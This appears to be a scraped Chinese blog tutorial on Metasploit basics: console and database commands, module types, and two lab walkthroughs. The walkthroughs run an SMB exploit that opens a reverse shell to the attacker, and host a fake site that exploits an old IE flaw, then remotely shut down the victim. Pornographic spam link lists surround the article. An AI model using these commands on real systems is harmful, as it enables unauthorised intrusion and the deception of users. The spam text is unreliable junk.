日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 综合教程 >内容正文

综合教程

MSF——基本使用和Exploit模块(一)

發布時間:2023/12/13 综合教程 33 生活家
生活随笔 收集整理的這篇文章主要介紹了 MSF——基本使用和Exploit模块(一) 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

MSF系列:

MSF——基本使用和Exploit模塊(一)

MSF——Payload模塊(二)

MSF——Meterpreter(三)

MSF——信息收集(四)

MSF——Metasploit Framework

目前最流行、最強大、最具擴展性的滲透測試平臺軟件

2003年由HDMore發布第一版,2007年用ruby語言重寫,MSF默認集成在KaliLinux之中

Kali左側有MSF的快捷方式,可以直接點擊使用,也可以在終端輸入msfconsole啟動MSF

msfdb

用來管理MSF的數據庫的命令

msfdb init     # start and initialize the database
msfdb reinit   # delete and reinitialize the database
msfdb delete   # delete database and stop using it
msfdb start    # start the database
msfdb stop     # stop the database
msfdb status   # check service status
msfdb run      # start the database and run msfconsole

MSF架構——技術功能模塊

MSF默認存放模塊的目錄如下

/usr/share/metasploit-framework/modules/

MSF有6個模塊,分別對上面目錄下的6個子文件夾:

auxiliary

負責執行信息收集、掃描、嗅探、指紋識別、口令猜測和Dos攻擊等功能的輔助模塊

exploits

利用系統漏洞進行攻擊的動作,此模塊對應每一個具體漏洞的攻擊方法(主動、被動)

payloads

成功exploit之后,真正在目標系統執行的代碼或指令。分為3種類型的payload,分別是single、stages和stagers。shellcode是特殊的payload,用于拿shell。

single:all-in-one。完整的payload,這些payload都是一體化的,不需要依賴外部的庫和包。
stagers:目標計算機內存有限時,先傳輸一個較小的payload用于建立連接
stages:利用stagers建立的連接下載后續payload

encoders

對payload進行加密,躲避AntiVirus檢查的模塊

nops

提高payload穩定性及維持大小。在滲透攻擊構造惡意數據緩沖區時,常常要在真正要執行的Shellcode之前添加一段空指令區, 這樣當觸發滲透攻擊后跳轉執行ShellCode時,有一個較大的安全著陸區,從而避免受到內存 地址隨機化、返回地址計算偏差等原因造成的ShellCode執行失敗,提高滲透攻擊的可靠性。

post

后期滲透模塊。在取得目標系統遠程控制權后,進行一系列的后滲透攻擊動作,如獲取敏感信息、跳板攻擊等操作

基本使用

Kali中更新MSF

apt update
apt install metasploit-framework

msfconsole

控制臺命令支持TAB補全,支持外部命令的執行(系統命令)

help或?

顯示msfconsole可以使用的命令。help <command>,顯示某一命令的用法。

connect

可以理解成MSF中的nc命令,可以使用connect -h查看詳細用法。
connect [options] <host> <port>

show

用show命令查看msf提供的資源。在根目錄下執行的話,由于有些模塊資源比較多,需要執行show命令要較長的時間
show exploits:查看可以使用的exploit
除了exploits,還支持all, encoders, nops, exploits, payloads, auxiliary, post, plugins, info, options。有些選項需要用use使用一個模塊后才能使用,比如給showtargets。

search

搜索模塊
簡單搜索:seachms17_010
多條件搜索縮小范圍:search name:mysql type:exploit platform:linux

info

查看模塊的信息
info <module name>
如果用use使用了一個模塊,直接輸入info即可查看

use

search找到模塊后,用use使用模塊
use exploit/windows/smb/ms08_067_netapi
用use使用一個模塊后,可以使用 show options查看我們需要配置的選項、使用showtargets選擇目標主機系統、使用showpayloads選擇payload、使用showadvanced查看高級參數、使用showevasion查看用來做混淆、逃避的模塊。
set/setg

設置參數,比如要滲透的主機IP、payload等。我們可以用show missing查看沒有設置的參數
setg是設置全局變量,避免每個模塊都要輸入相同的參數

unset/unsetg:

取消設置參數。unsetg是取消設置的全局變量

save

設置的參數在下一次啟動的時候不會生效,可以用save保存我們使用過程的設置。

check

檢查目標是否真的存在這個漏洞,大部分模塊沒有check功能

back

回到msfconsole根目錄

run或exploit

開始使用模塊
exploit -j:以后臺的方式運行

sessions

查看當前已經建立的sessions,說明已經拿到了shell
sessions -i id 可以進入一個session交互

load/unload

調用外部的掃描命令,比如openvas

loadpath

加載自己的模塊

route

添加一條路由。比如發往某個子網的流量都通過攻陷的機器發送。

msf數據庫相關

db_status

查看MSF有沒有連接上后臺數據庫。如果沒有連上數據庫,在終端輸入msfdb start后再啟動MSF。沒有連接上數據庫MSF也是可以使用的,只是連接上了的話,我們滲透過程中獲取的一些信息可以保存下來,比如目標機器的賬號密碼信息等。

db_rebuild_cache

這個命令將所有模塊信息緩存到數據庫中,通過數據庫檢索效率就高很多了。

db_disconnect

斷開數據庫連接。

db_connect

msf默認連上postgresql的msf數據庫。可以用db_connect連接我們指定的數據庫。如果要使用配置文件進行連接,默認的數據庫配置文件為/usr/share/metasploit-framework/config/database.yml,可以參考這個文件進行編寫。

db_nmap

集成在msf中的namp掃描命令。不同的是db_nmap掃描的結果會自動保存到數據庫中。
可以輸入hosts查看掃描到的主機信息
如果數據多,可以用 hosts IP 進行過濾;hosts -u 查看up狀態的機器;使用 hosts -c 列名[,列名] 指定要看的列;使用 hosts -S 進行搜索,比如hosts -S windows。
輸入services可以查看主機開放的端口情況

creds:

查看掃描出來的密碼信息

vulns:

查看掃描出來的漏洞信息

loot

有些賬號密碼我們可能沒有獲取到明文信息,可是經過加密的hash值,可以用這個顯示

db_export/db_import

數據庫的導入和導出
db_export -f /root/msfbak.xml
nmap導出的也可以導入到msf中
nmap -A 192.168.1.113 -oX nmap.xml => db_import -f /root/nmap.xml

Exploit模塊

分為Active Exploit和Passive Exploit

Active Exploit

目標提供了某種服務,服務存在漏洞

useexploit/windows/smb/ms17_010_psexec
set RHOST 192.168.1.100
set PAYLOAD windows/shell/reverse_tcp
set LHOST 192.168.1.1
set LPORT 4444
set SMBUSER user1
set SMBPASS pass1
exploit

Passive Exploit

被攻擊者通常不開放端口或開放端口上的服務沒有漏洞,漏洞存在于受害者機器上的客戶端軟件上。客戶端需要訪問某些遠程服務器上的服務,當它訪問的時候,當在服務器上放置了漏洞利用代碼,由于客戶端程序存在漏洞,服務器也會將這些漏洞利用代碼作為響應報文返回給客戶端,造成客戶端漏洞被利用。

useexploit/windows/browser/ms07_017_ani_loadimage_chunksize
setURIPATH /
set PAYLOADwindows/shell/reverse_tcp
set LHOST 192.168.1.1
set PORT 4444
exploit

Active Exploit演示

實驗機器

受害者:Windows 7 旗艦版 6.1.7601 Service Pack 1 Build 7601,關閉Windows7防火墻。IP地址為192.168.171.133
攻擊者:Kali 4.18.0。IP地址為192.168.171.129

Kali上啟動MSF,可以先啟動postgresql數據庫,防止后面MSF連不上數據庫

service postgresql start

我們利用exploit/windows/smb/ms17_010_psexec進行攻擊,由于它是基于SMB協議的,我們需要知道目標系統的一個用戶賬號和密碼,適合在已經知道目標系統賬號密碼并開放SMB端口的情況下進行攻擊。

然后設置受害者的IP地址,賬號和密碼,并設置payload為windows/shell/reverse_tcp。這是一個反彈連接,我們還需要設置目標反彈連接時的IP地址和端口。

然后輸入exploit執行,可以看到已經創建了一個session

通過session -l可以查看已經創建的會話

根據上面的Id,我們可以sessions -i 1進入這個shell

查看一下目標的機器IP

可以看到上面有很多亂碼,在Kali的終端中,我們可以設置shell中字符的編碼

這時候就不會是亂碼了

Passive Exploit演示

實驗機器

受害者:Windows XP SP2 professional。IP地址為192.168.171.135
攻擊者:Kali 4.18.0。IP地址為192.168.171.129

打開XP的防火墻

這時候用Active的方式進行攻擊不會成功,采用Passive方式,構造一個鏈接,誘使被害者連接,利用瀏覽器的漏洞。

我們要偽造一個網站,誘使受害者攻擊。SRVHOST可以指定為本機的IP地址,我們也可以打開SSL和設置SSL的證書,迷惑有安全意識的用戶。

URIPATH是訪問的URL地址,可以手動指定,比如192.168.171.129/service,這里我們默認設置為根目錄即可。

然后輸入exploit

它不會主動向受害者的機器發送利用代碼,而是偽造了一個存在漏洞利用代碼的WEB站點,這個站點等待IE版本存在漏洞的用戶去訪問它,將exploit注入到瀏覽器進程中,利用瀏覽器漏洞執行payload

我們在XP機器上用IE瀏覽器訪問這個URL

Kali上已經有了一個sessions,進入這個sessions

輸入以下命令讓XP機器關機

shutdown -s -f -t 0

在XP上就會看到機器正在關機

總結

對開放的服務器一般使用Active的方式,對客戶端程序的攻擊一般使用Passive的方式

參考資料

https://www.freebuf.com/column/194412.html

總結

以上是生活随笔為你收集整理的MSF——基本使用和Exploit模块(一)的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。

主站蜘蛛池模板: 亚洲一区二区三区四区 | 中国毛片网| 91精品国产一区二区三区香蕉 | 亚洲在线免费视频 | 特黄1级潘金莲 | 午夜av成人| 欧美高清精品 | 国产精品999久久久 在线青草 | 亚洲自拍网站 | 久久久无码18禁高潮喷水 | 丁香综合激情 | 久久久久网站 | 成人免费观看av | 91精品国产91久久久久久吃药 | 中日韩欧美在线观看 | 在线播放的av | 伊人网视频在线 | 国产超碰人人 | jizz一区二区三区 | 在线观看免费黄网站 | 亚洲天天做 | a级黄色录像 | 少妇厨房愉情理伦bd在线观看 | 在线观看日韩一区二区 | 久久久精品一区二区涩爱 | 久草手机在线视频 | 丝袜诱惑一区二区 | 国产欧美二区 | 国产免费一区二区三区最新不卡 | 女生被男生c | 免费视频一区二区 | av老司机久久 | 超碰在线一区 | 中文文字幕一区二区三三 | 激情五月婷婷久久 | 亚洲第十页 | 岛国午夜视频 | 欧美成人a| 无码少妇精品一区二区免费动态 | 九色福利视频 | 日本专区在线 | 午夜精品无码一区二区三区 | 黄片毛片在线免费观看 | 日本少妇色 | 日韩激情精品 | 国产欧美一区二区精品性色超碰 | 成人一区二区三区视频 | 欧美三级精品 | 毛片在线不卡 | 无码国精品一区二区免费蜜桃 | 色婷婷影院 | 天堂网一区二区三区 | 成人国产精品免费 | 亚洲怡春院| 香蕉视频污视频 | 国产免费一级片 | 成人免费视频久久 | 亚洲女人久久久 | 扒开jk护士狂揉免费 | 韩国在线不卡 | 久久久久久婷婷 | 妺妺窝人体色www聚色窝仙踪 | 日本视频在线看 | 不良视频在线观看 | 小视频在线看 | 亚洲一区二区三 | 国产九色视频 | 日韩久久久久久久久 | 男女偷爱性视频刺激 | 天堂在线观看中文字幕 | 91香蕉视频黄色 | 日韩视频一区在线 | 成年人的天堂 | 在线观看一区二区三区四区 | 精品久久九九 | 自拍偷拍国产视频 | 成人免费看 | 一本色道久久综合亚洲精品小说 | 亚洲free性xxxx护士hd | 精品国产亚洲AV | 久久国内精品视频 | 日韩精品一区二区三区色欲av | 久久精品视频3 | 中文字幕在线视频不卡 | 色综合免费视频 | 农村搞破鞋视频大全 | 热久久久久久 | 国产91久久久 | 三度诱惑免费版电影在线观看 | 久操福利视频 | 国产一级特黄a高潮片 | 一级日韩片 | 日韩无套无码精品 | 超碰国产97 | 国产噜噜噜 | 激情综合一区二区三区 | 欧美黑人一级爽快片淫片高清 | 日本福利在线观看 | 国产香蕉一区二区三区 |